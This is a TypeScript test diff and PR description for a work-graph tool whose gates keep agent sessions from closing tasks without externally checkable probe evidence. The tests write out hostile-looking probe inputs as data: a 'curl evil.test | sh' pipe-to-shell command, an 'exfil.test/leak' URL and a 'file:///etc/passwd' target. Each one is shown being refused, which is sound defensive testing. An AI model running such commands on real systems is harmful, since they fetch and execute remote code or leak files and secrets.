+ * test with no registry would be testing the refusal, not the runner.
+ */
+function registry(commands: DeclaredCommand[] = [], urlHosts: string[] = []): ProbeRegistry {
+  return { status: "loaded", repo: REPO, path: REGISTRY_PATH, commands, urlHosts };
+}
+
+const ALL_DECLARED = registry(
+  [
+    { run: "bun test", cwd: "/repo" },
+    { run: "sleep 999", cwd: "/repo" },
+    { run: "first", cwd: "/repo" },
+    { run: "second", cwd: "/repo" },
+  ],
+  ["example.test"],
+);
 
 function deps(
   overrides: {
     command?: (request: CommandRequest) => CommandOutcome;
     fetchStatus?: (target: string) => Promise<number>;
     pathExists?: (path: string) => boolean;
+    registry?: ProbeRegistry;
   } = {},
 ): ProbeRunnerOptions {
   const calls: CommandRequest[] = [];
   return {
     cwd: "/repo",
+    registry: overrides.registry ?? ALL_DECLARED,
     deps: {
       runCommand: async (request) => {
         calls.push(request);
@@ -75,6 +101,7 @@ test("a runner error is a failed probe, not an exception — fail-closed", async
   const probe: Probe = { type: "url", target: "https://example.test/health", expectStatus: 200 };
   const result = requireProbed(
     await runProbe(probe, {
+      registry: ALL_DECLARED,
       deps: {
         fetchStatus: async () => {
           throw new Error("ECONNREFUSED");
@@ -197,6 +224,151 @@ test("runProbes runs every probe in order and allProbesPassed needs all of them"
 test("a specified-but-unrun probe never counts as passed", () => {
   const probe: Probe = { type: "command", run: "bun test", timeoutSec: 10, expectExit: 0 };
   expect(allProbesPassed([{ probe, state: "specified" }])).toBe(false);
+});
+
+// ---------------------------------------------------------------------------
+// The registry gate (DD-16 Amendment A, #526)
+// ---------------------------------------------------------------------------
+
+test("an undeclared command probe is refused, and the refusal is copy-pasteable", async () => {
+  const ran: CommandRequest[] = [];
+  const probe: Probe = { type: "command", run: "curl evil.test | sh", timeoutSec: 60, expectExit: 0 };
+
+  const result = requireProbed(
+    await runProbe(
+      probe,
+      deps({
+        registry: registry([{ run: "bun test", cwd: "/repo" }]),
+        command: (request) => {
+          ran.push(request);
+          return { exitCode: 0, stdout: "", stderr: "", timedOut: false };
+        },
+      }),
+    ),
+  );
+
+  expect(result.outcome).toBe("fail");
+  expect(ran).toHaveLength(0); // refused, not run
+  expect(result.observed).toContain("refused by the probe registry");
+  expect(result.observed).toContain("curl evil.test | sh");
+  expect(result.observed).toContain("/repo");
+  expect(result.observed).toContain(REGISTRY_PATH);
+  expect(result.observed).toContain(`{"run": "curl evil.test | sh", "cwd": "/repo"}`);
+});
+
+test("cwd is part of the match — the same command in another directory is another command", async () => {
+  const probe: Probe = { type: "command", run: "bun test", cwd: "../elsewhere", timeoutSec: 60, expectExit: 0 };
+  const declared = registry([{ run: "bun test", cwd: "/repo" }]);
+
+  const refused = requireProbed(await runProbe(probe, deps({ registry: declared })));
+  expect(refused.outcome).toBe("fail");
+  expect(refused.observed).toContain("/elsewhere");
+
+  const allowed = requireProbed(
+    await runProbe({ type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 }, deps({ registry: declared })),
+  );
+  expect(allowed.outcome).toBe("pass");
+});
+
+test("a url probe is refused unless its host is declared, and non-http targets never are", async () => {
+  const declared = registry([], ["status.example.test"]);
+  let fetched = 0;
+  const fetchStatus = async (): Promise<number> => {
+    fetched += 1;
+    return 200;
+  };
+
+  const undeclaredHost = requireProbed(
+    await runProbe({ type: "url", target: "https://exfil.test/leak", expectStatus: 200 }, deps({ registry: declared, fetchStatus })),
+  );
+  expect(undeclaredHost.outcome).toBe("fail");
+  expect(undeclaredHost.observed).toContain("exfil.test");
+  expect(undeclaredHost.observed).toContain("urlHosts");
+  expect(fetched).toBe(0); // no request left the machine
+
+  const localFile = requireProbed(
+    await runProbe({ type: "url", target: "file:///etc/passwd", expectStatus: 200 }, deps({ registry: declared, fetchStatus })),
+  );
+  expect(localFile.outcome).toBe("fail");
+  expect(localFile.observed).toContain("not an http(s) URL");
+  expect(fetched).toBe(0);
+
+  const declaredHost = requireProbed(
+    await runProbe({ type: "url", target: "https://STATUS.example.test/health", expectStatus: 200 }, deps({ registry: declared, fetchStatus })),
+  );
+  expect(declaredHost.outcome).toBe("pass");
+  expect(fetched).toBe(1);
+});
+
+test("a machine with no registry refuses command and url probes but still runs the argv ones", async () => {
+  const absent: ProbeRegistry = { status: "absent", repo: REPO, path: REGISTRY_PATH };
+
+  const command = requireProbed(
+    await runProbe({ type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 }, deps({ registry: absent })),
+  );
+  expect(command.outcome).toBe("fail");
+  expect(command.observed).toContain("no registry exists at");
+  expect(command.observed).toContain(`"version": 1`); // the starter document to create
+
+  const url = requireProbed(
+    await runProbe({ type: "url", target: "https://example.test/", expectStatus: 200 }, deps({ registry: absent })),
+  );
+  expect(url.outcome).toBe("fail");
+
+  const gitRef = requireProbed(
+    await runProbe(
+      { type: "git-ref-exists", ref: "main" },
+      deps({ registry: absent, command: () => ({ exitCode: 0, stdout: "abc1234\n", stderr: "", timedOut: false }) }),
+    ),
+  );
+  expect(gitRef.outcome).toBe("pass");
+
+  const artifact = requireProbed(
+    await runProbe({ type: "artifact-exists", path: "src/work-graph.ts" }, deps({ registry: absent, pathExists: () => true })),
+  );
+  expect(artifact.outcome).toBe("pass");
+});
+
+test("an unusable registry refuses rather than falling open", async () => {
+  const invalid: ProbeRegistry = {
+    status: "invalid",
+    repo: REPO,
+    path: REGISTRY_PATH,
+    reason: "is not valid JSON: Unexpected token",
+  };
+
+  const result = requireProbed(
+    await runProbe({ type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 }, deps({ registry: invalid })),
+  );
+  expect(result.outcome).toBe("fail");
+  expect(result.observed).toContain("is unusable");
+  expect(result.observed).toContain("not valid JSON");
+});
+
+test("the runner refuses gated probes when no registry is supplied at all", async () => {
+  const result = requireProbed(
+    await runProbe(
+      { type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 },
+      { cwd: "/repo", deps: { now: () => AT } },
+    ),
+  );
+  expect(result.outcome).toBe("fail");
+  expect(result.observed).toContain("given no registry");
+});
+
+test("isProbeRefusal separates a gate refusal from a command that ran and failed", async () => {
+  const refused = await runProbe(
+    { type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 },
+    deps({ registry: registry() }),
+  );
+  const failed = await runProbe(
+    { type: "command", run: "bun test", timeoutSec: 60, expectExit: 0 },
+    deps({ command: () => ({ exitCode: 1, stdout: "", stderr: "boom", timedOut: false }) }),
+  );
+
+  expect(isProbeRefusal(refused)).toBe(true);
+  expect(isProbeRefusal(failed)).toBe(false);
+  expect(isProbeRefusal({ probe: refused.probe, state: "specified" })).toBe(false);
 });
 
 test("observed output keeps the tail, where the failure reason lives", () => {

--- a/test/work-graph.test.ts
+++ b/test/work-graph.test.ts
@@ -278,6 +278,10 @@ class FakeStore implements GraphStore {
     return { id: `comment-${ref.id}-${body.length}`, nodeId: ref.id };
   }
 
+  async readComment(ref: CommentRef): Promise<CommentRef> {
+    return { ...ref, author: "ivy-agent" };
+  }
+
   async readCommentReactions(): Promise<never[]> {
     return [];
   }

--- a/test/work-graph.test.ts
+++ b/test/work-graph.test.ts
@@ -1,0 +1,383 @@
+import { expect, test } from "bun:test";
+import {
+  WorkGraph,
+  WorkGraphError,
+  assertClosable,
+  parseNodeSpec,
+  parseProbe,
+  renderCloseReceipt,
+  resolveClaimRace,
+  type ClaimResult,
+  type CloseReceipt,
+  type CommentRef,
+  type CreateNodeSpec,
+  type GraphStore,
+  type NodeRef,
+  type NodeState,
+  type Probe,
+  type WorkGraphNode,
+} from "../src/index";
+
+const PASSING_PROBE: Probe = { type: "command", run: "bun test", timeoutSec: 600, expectExit: 0 };
+
+function codeOf(fn: () => unknown): string {
+  try {
+    fn();
+  } catch (error) {
+    return error instanceof WorkGraphError ? error.code : `not-a-WorkGraphError:${String(error)}`;
+  }
+  return "no-throw";
+}
+
+async function asyncCodeOf(fn: () => Promise<unknown>): Promise<string> {
+  try {
+    await fn();
+  } catch (error) {
+    return error instanceof WorkGraphError ? error.code : `not-a-WorkGraphError:${String(error)}`;
+  }
+  return "no-throw";
+}
+
+// --- parsing: the authoritative barrier at the store boundary (§2.1) --------
+
+test("an auto node without probes is rejected at the boundary, whatever the caller's typing says", () => {
+  // The tuple type guards literal construction; this is the JSON path that
+  // bypasses it entirely.
+  const fromJson: unknown = JSON.parse('{"title":"headless work","autonomy":"auto"}');
+  expect(codeOf(() => parseNodeSpec(fromJson))).toBe("invalid-node");
+  expect(codeOf(() => parseNodeSpec({ title: "headless work", autonomy: "auto", probes: [] }))).toBe("invalid-node");
+});
+
+test("an auto node with at least one probe parses, and keeps the probe", () => {
+  const spec = parseNodeSpec({ title: "seam", autonomy: "auto", probes: [PASSING_PROBE] });
+  expect(spec.autonomy).toBe("auto");
+  expect(spec.probes).toEqual([PASSING_PROBE]);
+});
+
+test("HITL nodes may carry no probes", () => {
+  expect(parseNodeSpec({ title: "grill the credential topology", autonomy: "approve" }).probes).toBeUndefined();
+});
+
+test("kind is normalized in form and never interpreted in meaning", () => {
+  expect(parseNodeSpec({ title: "t", autonomy: "approve", kind: "  Grilling  " }).kind).toBe("grilling");
+  expect(parseNodeSpec({ title: "t", autonomy: "approve", kind: "wholly-invented-kind" }).kind).toBe("wholly-invented-kind");
+  expect(parseNodeSpec({ title: "t", autonomy: "approve" }).kind).toBeUndefined();
+  expect(codeOf(() => parseNodeSpec({ title: "t", autonomy: "approve", kind: "   " }))).toBe("invalid-node");
+});
+
+test("ids are store-assigned, so a caller-supplied one is refused", () => {
+  expect(codeOf(() => parseNodeSpec({ id: "42", title: "t", autonomy: "approve" }))).toBe("invalid-node");
+});
+
+test("titles and autonomy are required", () => {
+  expect(codeOf(() => parseNodeSpec({ autonomy: "approve" }))).toBe("invalid-node");
+  expect(codeOf(() => parseNodeSpec({ title: "   ", autonomy: "approve" }))).toBe("invalid-node");
+  expect(codeOf(() => parseNodeSpec({ title: "t", autonomy: "whenever" }))).toBe("invalid-node");
+  expect(codeOf(() => parseNodeSpec("not an object"))).toBe("invalid-node");
+});
+
+test("budgets must declare a positive cap", () => {
+  expect(parseNodeSpec({ title: "t", autonomy: "approve", budget: { tokens: 100 } }).budget).toEqual({ tokens: 100 });
+  expect(codeOf(() => parseNodeSpec({ title: "t", autonomy: "approve", budget: {} }))).toBe("invalid-node");
+  expect(codeOf(() => parseNodeSpec({ title: "t", autonomy: "approve", budget: { tokens: 0 } }))).toBe("invalid-node");
+});
+
+test("every probe variant parses, and prose is not one of them", () => {
+  const probes: unknown[] = [
+    { type: "command", run: "bunx tsc --noEmit", timeoutSec: 120, expectExit: 0 },
+    { type: "url", target: "https://example.test/health", expectStatus: 200 },
+    { type: "git-ref-exists", ref: "refs/heads/feat/work-graph-primitive" },
+    { type: "git-merged-into", ref: "feat/work-graph-primitive", into: "main" },
+    { type: "artifact-exists", path: "src/work-graph.ts", atRef: "HEAD" },
+  ];
+  for (const probe of probes) expect(parseProbe(probe)).toEqual(probe as Probe);
+
+  expect(codeOf(() => parseProbe({ type: "reviewer-says-it-is-fine", run: "trust me" }))).toBe("invalid-probe");
+  expect(codeOf(() => parseProbe({ type: "command", run: "bun test", timeoutSec: 0, expectExit: 0 }))).toBe("invalid-probe");
+  expect(codeOf(() => parseProbe({ type: "url", target: "https://x.test", expectStatus: 999 }))).toBe("invalid-probe");
+});
+
+// --- claim race (§2.4) ------------------------------------------------------
+
+test("the sole assignee holds the claim", () => {
+  expect(resolveClaimRace("ivy-agent", ["ivy-agent"])).toEqual({ held: true, holder: "ivy-agent" });
+});
+
+test("a race converges on the code-point-first login, and every racer computes the same winner", () => {
+  const assignees = ["jcfischer", "ivy-agent", "Zed"];
+  expect(resolveClaimRace("Zed", assignees)).toEqual({ held: true, holder: "Zed" });
+  expect(resolveClaimRace("ivy-agent", assignees)).toEqual({ held: false, holder: "Zed" });
+  expect(resolveClaimRace("jcfischer", assignees)).toEqual({ held: false, holder: "Zed" });
+  // Uppercase sorts before lowercase by code point — the rule is arbitrary but
+  // identical on every machine, which is the property that matters.
+  expect(resolveClaimRace("Zed", ["Zed", "aaa"]).held).toBe(true);
+});
+
+test("an empty assignee set means the write did not land — nobody holds it", () => {
+  expect(resolveClaimRace("ivy-agent", [])).toEqual({ held: false, holder: null });
+});
+
+// --- close gating (§2.1, §3.1, §3.2) ---------------------------------------
+
+const AUTO_NODE: WorkGraphNode = {
+  id: "497",
+  title: "GraphStore seam",
+  autonomy: "auto",
+  checkpointId: "cp-497",
+  probes: [PASSING_PROBE],
+};
+
+function receipt(overrides: Partial<CloseReceipt> = {}): CloseReceipt {
+  return {
+    checkpointId: "cp-497",
+    closedBy: "ivy-agent",
+    at: "2026-08-04T10:00:00.000Z",
+    evidence: [{ kind: "probed", summary: "bun test exit 0", pointer: "https://example.test/run/1" }],
+    probeResults: [
+      { probe: PASSING_PROBE, state: "probed", outcome: "pass", observed: "exit 0", at: "2026-08-04T09:59:00.000Z" },
+    ],
+    attestation: "unverified",
+    ...overrides,
+  };
+}
+
+test("a node with no attached checkpoint cannot close", () => {
+  const { checkpointId: _unused, ...noCheckpoint } = AUTO_NODE;
+  expect(codeOf(() => { assertClosable(noCheckpoint, receipt()); })).toBe("close-refused");
+});
+
+test("the receipt must name the node's own checkpoint", () => {
+  expect(codeOf(() => { assertClosable(AUTO_NODE, receipt({ checkpointId: "cp-somewhere-else" })); })).toBe("close-refused");
+});
+
+test("a probe that was specified but never run refuses the close", () => {
+  const hollow = receipt({ probeResults: [{ probe: PASSING_PROBE, state: "specified" }] });
+  expect(codeOf(() => { assertClosable(AUTO_NODE, hollow); })).toBe("close-refused");
+  expect(codeOf(() => { assertClosable(AUTO_NODE, receipt({ probeResults: [] })); })).toBe("close-refused");
+});
+
+test("a probe that ran and failed refuses the close", () => {
+  const failed = receipt({
+    probeResults: [
+      { probe: PASSING_PROBE, state: "probed", outcome: "fail", observed: "exit 1", at: "2026-08-04T09:59:00.000Z" },
+    ],
+  });
+  expect(codeOf(() => { assertClosable(AUTO_NODE, failed); })).toBe("close-refused");
+});
+
+test("judged evidence never suffices alone — a model's opinion informs, never decides", () => {
+  const judged = receipt({ evidence: [{ kind: "judged", summary: "sage approved", pointer: "https://example.test/review" }] });
+  expect(codeOf(() => { assertClosable(AUTO_NODE, judged); })).toBe("close-refused");
+});
+
+test("agent-external evidence without a pointer is a self-report, not a receipt", () => {
+  const pointerless = receipt({ evidence: [{ kind: "probed", summary: "it worked on my machine" }] });
+  expect(codeOf(() => { assertClosable(AUTO_NODE, pointerless); })).toBe("close-refused");
+});
+
+test("an auto node closes on probed evidence with a pointer and every probe passed", () => {
+  expect(() => { assertClosable(AUTO_NODE, receipt()); }).not.toThrow();
+});
+
+test("a HITL node needs approved evidence — probed evidence is not a ratification", () => {
+  const hitl: WorkGraphNode = { id: "511", title: "credential confinement", autonomy: "approve", checkpointId: "cp-511" };
+  const probedOnly = receipt({ checkpointId: "cp-511", probeResults: [] });
+  expect(codeOf(() => { assertClosable(hitl, probedOnly); })).toBe("close-refused");
+
+  const ratified = receipt({
+    checkpointId: "cp-511",
+    probeResults: [],
+    evidence: [{ kind: "approved", summary: "👍 by jcfischer", pointer: "https://example.test/#issuecomment-1" }],
+  });
+  expect(() => { assertClosable(hitl, ratified); }).not.toThrow();
+});
+
+test("an unverified attestation still closes — gating on it would deadlock the bootstrap", () => {
+  expect(() => { assertClosable(AUTO_NODE, receipt({ attestation: "unverified" })); }).not.toThrow();
+});
+
+test("the rendered receipt carries the checkpoint, the attestation and the evidence pointers", () => {
+  const rendered = renderCloseReceipt(
+    receipt({
+      attestationFacts: { backendCapability: "verifiable", root: { nodeId: "495", author: "jcfischer" } },
+    }),
+  );
+  expect(rendered).toContain("cp-497");
+  expect(rendered).toContain("`unverified`");
+  expect(rendered).toContain("https://example.test/run/1");
+  expect(rendered).toContain("**pass**");
+  expect(rendered).toContain('"backendCapability": "verifiable"');
+});
+
+// --- contract layer over a store -------------------------------------------
+
+interface FakeNode {
+  state: NodeState;
+  blockers: string[];
+}
+
+class FakeStore implements GraphStore {
+  readonly attestation = "verifiable" as const;
+  readonly nodes = new Map<string, FakeNode>();
+  readonly children = new Map<string, string[]>();
+  readonly closed: { ref: NodeRef; receipt: CloseReceipt }[] = [];
+  readonly created: CreateNodeSpec[] = [];
+  readonly edges: [string, string][] = [];
+  readonly claims: string[] = [];
+  private nextId = 1000;
+
+  add(id: string, overrides: Partial<NodeState> = {}, blockers: string[] = []): void {
+    const node: WorkGraphNode = { id, title: `node ${id}`, autonomy: "approve", checkpointId: `cp-${id}` };
+    this.nodes.set(id, {
+      blockers,
+      state: {
+        ref: { id },
+        node,
+        status: "open",
+        assignees: [],
+        blockedBy: [],
+        author: "jcfischer",
+        typed: true,
+        ...overrides,
+      },
+    });
+  }
+
+  async createNode(spec: CreateNodeSpec): Promise<NodeRef> {
+    this.created.push(spec);
+    const id = String(this.nextId++);
+    this.add(id);
+    return { id };
+  }
+
+  async addBlockingEdge(blocker: NodeRef, blocked: NodeRef): Promise<void> {
+    this.edges.push([blocker.id, blocked.id]);
+    const entry = this.nodes.get(blocked.id);
+    if (entry) entry.blockers.push(blocker.id);
+  }
+
+  async readNode(ref: NodeRef): Promise<NodeState> {
+    const entry = this.nodes.get(ref.id);
+    if (!entry) throw new Error(`no such node ${ref.id}`);
+    return {
+      ...entry.state,
+      blockedBy: entry.blockers.map((id) => ({ id, status: this.nodes.get(id)?.state.status ?? "open" })),
+    };
+  }
+
+  async listCandidateFrontier(root: NodeRef): Promise<NodeRef[]> {
+    return (this.children.get(root.id) ?? []).map((id) => ({ id }));
+  }
+
+  async claim(ref: NodeRef, identity: string): Promise<ClaimResult> {
+    this.claims.push(`${ref.id}:${identity}`);
+    return { held: true, identity, holder: identity, assignees: [identity] };
+  }
+
+  async postComment(ref: NodeRef, body: string): Promise<CommentRef> {
+    return { id: `comment-${ref.id}-${body.length}`, nodeId: ref.id };
+  }
+
+  async readCommentReactions(): Promise<never[]> {
+    return [];
+  }
+
+  async close(ref: NodeRef, closeReceipt: CloseReceipt): Promise<void> {
+    this.closed.push({ ref, receipt: closeReceipt });
+    const entry = this.nodes.get(ref.id);
+    if (entry) entry.state = { ...entry.state, status: "closed" };
+  }
+}
+
+test("createNode validates before the store is ever touched", async () => {
+  const store = new FakeStore();
+  const graph = new WorkGraph(store);
+  expect(await asyncCodeOf(() => graph.createNode({ title: "t", autonomy: "auto" }))).toBe("invalid-node");
+  expect(store.created).toHaveLength(0);
+
+  await graph.createNode({ title: "t", autonomy: "auto", probes: [PASSING_PROBE] });
+  expect(store.created).toHaveLength(1);
+});
+
+test("a node cannot block itself", async () => {
+  const store = new FakeStore();
+  store.add("1");
+  const graph = new WorkGraph(store);
+  expect(await asyncCodeOf(() => graph.addBlockingEdge({ id: "1" }, { id: "1" }))).toBe("invalid-edge");
+  expect(store.edges).toHaveLength(0);
+});
+
+test("an edge that would close a cycle is rejected — directly and transitively", async () => {
+  const store = new FakeStore();
+  store.add("1");
+  store.add("2");
+  store.add("3");
+  const graph = new WorkGraph(store);
+
+  await graph.addBlockingEdge({ id: "1" }, { id: "2" }); // 1 blocks 2
+  expect(await asyncCodeOf(() => graph.addBlockingEdge({ id: "2" }, { id: "1" }))).toBe("cycle");
+
+  await graph.addBlockingEdge({ id: "2" }, { id: "3" }); // 1 → 2 → 3
+  expect(await asyncCodeOf(() => graph.addBlockingEdge({ id: "3" }, { id: "1" }))).toBe("cycle");
+  expect(store.edges).toEqual([
+    ["1", "2"],
+    ["2", "3"],
+  ]);
+});
+
+test("a diamond is not a cycle", async () => {
+  const store = new FakeStore();
+  for (const id of ["1", "2", "3", "4"]) store.add(id);
+  const graph = new WorkGraph(store);
+  await graph.addBlockingEdge({ id: "1" }, { id: "2" });
+  await graph.addBlockingEdge({ id: "1" }, { id: "3" });
+  await graph.addBlockingEdge({ id: "2" }, { id: "4" });
+  await graph.addBlockingEdge({ id: "3" }, { id: "4" });
+  expect(store.edges).toHaveLength(4);
+});
+
+test("the frontier is open, unassigned and unblocked — each candidate confirmed by direct fetch", async () => {
+  const store = new FakeStore();
+  store.add("open-unassigned");
+  store.add("assigned", { assignees: ["ivy-agent"] });
+  store.add("already-closed", { status: "closed" });
+  store.add("blocker");
+  store.add("blocked", {}, ["blocker"]);
+  store.add("released", {}, ["already-closed"]);
+  store.children.set("map", ["open-unassigned", "assigned", "already-closed", "blocked", "released"]);
+
+  const frontier = await new WorkGraph(store).frontier({ id: "map" });
+  expect(frontier.map((state) => state.ref.id)).toEqual(["open-unassigned", "released"]);
+});
+
+test("a stale candidate list cannot put a closed or claimed node on the frontier", async () => {
+  const store = new FakeStore();
+  store.add("stale", { status: "closed" });
+  store.children.set("map", ["stale", "stale"]);
+  expect(await new WorkGraph(store).frontier({ id: "map" })).toHaveLength(0);
+});
+
+test("claiming a closed node is refused", async () => {
+  const store = new FakeStore();
+  store.add("done", { status: "closed" });
+  const graph = new WorkGraph(store);
+  expect(await asyncCodeOf(() => graph.claim({ id: "done" }, "ivy-agent"))).toBe("node-closed");
+  expect(store.claims).toHaveLength(0);
+});
+
+test("close gates on the node as the store reports it, not on a caller-supplied copy", async () => {
+  const store = new FakeStore();
+  // The stored node is `auto` with a probe; a caller who omits the probe result
+  // is refused even though their own receipt looks complete to them.
+  store.add("497", {
+    node: { id: "497", title: "seam", autonomy: "auto", checkpointId: "cp-497", probes: [PASSING_PROBE] },
+  });
+  const graph = new WorkGraph(store);
+
+  expect(await asyncCodeOf(() => graph.close({ id: "497" }, receipt({ probeResults: [] })))).toBe("close-refused");
+  expect(store.closed).toHaveLength(0);
+
+  await graph.close({ id: "497" }, receipt());
+  expect(store.closed).toHaveLength(1);
+  expect(await asyncCodeOf(() => graph.close({ id: "497" }, receipt()))).toBe("node-closed");
+});


### PR DESCRIPTION
The **ships-with-consumer merge** of DD-16's work graph: the primitive, its
verbs, its trust gate, and its first consumer arrive on `main` together — or
none of them do (#484 clause 4). Closes the work-graph map's #499.

Five closed nodes of map #495 ride in this branch, each already reviewed as a
decision on the tracker:

| Commit | Node | What lands |
| --- | --- | --- |
| `a573886` | #497 | `GraphStore` seam + GitHub backend — every rule in `src/work-graph.ts`, I/O only in `src/work-graph-github.ts` |
| `29e2715` | #498 | The five `soma graph` verbs, the probe runner, the four-conjunct attestation derivation |
| `22938bf` | #524 | DD-16 **Amendment A** — tracker content may parameterise a probe, never introduce code |
| `4b03f1e` | #526 | The probe registry gate that enforces Amendment A |
| `7c09176` | #499 | **orienteer** — the wayfinder doctrine re-based onto the verbs |

## What this is

A typed primitive for cross-session effort topology: nodes of work joined by
blocking edges, walked by agent sessions, closed only through checkpoint gates.
Spec: `docs/work-graph.md`. Stance and rationale: DD-16 in
`design/design-decisions.md`.

Three properties are the point:

- **A gate is deterministic iff it reads facts the agent cannot author.**
  `assertClosable` refuses a hollow close: no attached checkpoint, a declared
  probe that never ran, a probe that ran and failed, or no externally checkable
  evidence pointer.
- **Evidence is typed by lifecycle, not by assertion.** A probe is `specified`
  at creation and flips to `probed` only when the runtime actually ran it.
  Timeout expiry is failure; an unrunnable probe is failure; a probe the
  registry refuses is failure. An unrun probe may never read as a passed one.
- **`attestation` is derived, never configured.** Four conjuncts at close time,
  and it is a *label rather than a gate* — refusing on `unverified` would
  deadlock a bootstrap whose credential-separation nodes are themselves
  `approve`-class. Every receipt on this deployment reads `unverified`, honestly,
  until #510/#511 land.

## The trust gate (#524 → #526)

`soma graph close` executes `command` probes that live in tracker content. Since
`soma graph` runs against whatever repo an adopter points it at, soma cannot
know that repo's visibility or collaborator set — so no rule of the form "trust
authors who are X" is available, and only a content-structural rule survives:

- `command` — refused unless the exact `run` **and** the resolved absolute `cwd`
  are declared in the adopter's soma-home registry for that repo.
- `url` — refused unless the target host is declared (ungated, it is a blind
  SSRF oracle whose result the receipt publishes to a world-readable tracker).
- The three argv probe types stay ungated.

Deny by default. `soma policy probes` reads the registry; **no verb writes it**,
because adding an entry is a loosening mutation on the gate itself.

## Verification

- `bun test` — 2208 pass / 0 fail. `bunx tsc --noEmit` — clean.
- All five verbs walked against live scratch nodes #514–#523 during #498.
- The registry gate walked live in #526: it refused that node's own probes until
  the registry declared them, then closed it with a real 2/2 receipt.
- `soma init --apply --substrate claude-code` into a temp home projects all six
  orienteer files byte-identically and catalogs the skill.
- Diff is 6311 insertions / 10 deletions. Every deletion is a line replaced in
  place, not removed work — but "all docs and comments" would be wrong, so, named:
  2 prose lines reflowed in `docs/work-graph.md`; 2 TypeScript lines in
  `src/cli/policy.ts` (the `ParsedPolicyArgs` union and the `usage: […].join()`
  line, both widened for the new `probes` subcommand); 4 comment lines and **2
  changed assertions** in `test/install.test.ts` (projected-file counts 29→35 and
  21→27, from the six orienteer files). Nothing pre-existing is reverted.

## Known limits, recorded rather than hidden

- Enforcement runs from the **installed binary**, not the dev tree (§1 clause 5).
  A dev-tree close warns on stderr rather than refusing — refusing would make the
  primitive undevelopable.
- Conjunct 2 of the attestation derivation is a **detector, not a defence**: it
  runs inside the environment it judges. `verified` rests on a trusted base the
  runtime cannot check (#511 plus an unshimmed binary).
- The probe registry rests on the same base. That is #511's invariant, not this
  branch's.
- Phase 2 (headless tick, close auditor) is spec'd at §5 and deliberately not
  built.
- **Ratification binds to a comment id, not to its text.** Nothing hashes the
  proposal body, so a proposal ratified and *then edited* still closes on that
  👍. "Materially amended proposals need fresh ratification" is doctrine the
  operator holds, not a property the runtime checks.
- **Any non-proposer's 👍 closes a HITL node.** The root author is preferred, but
  the fallback is the first other reaction; only `attestation` records that it
  was not the right human.
- The ungated argv probes are **not** bounded to the local tree — `repo` is
  tracker content resolved without containment (→ #529). The read path is
  strictly serial over `gh` subprocesses (→ #530).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
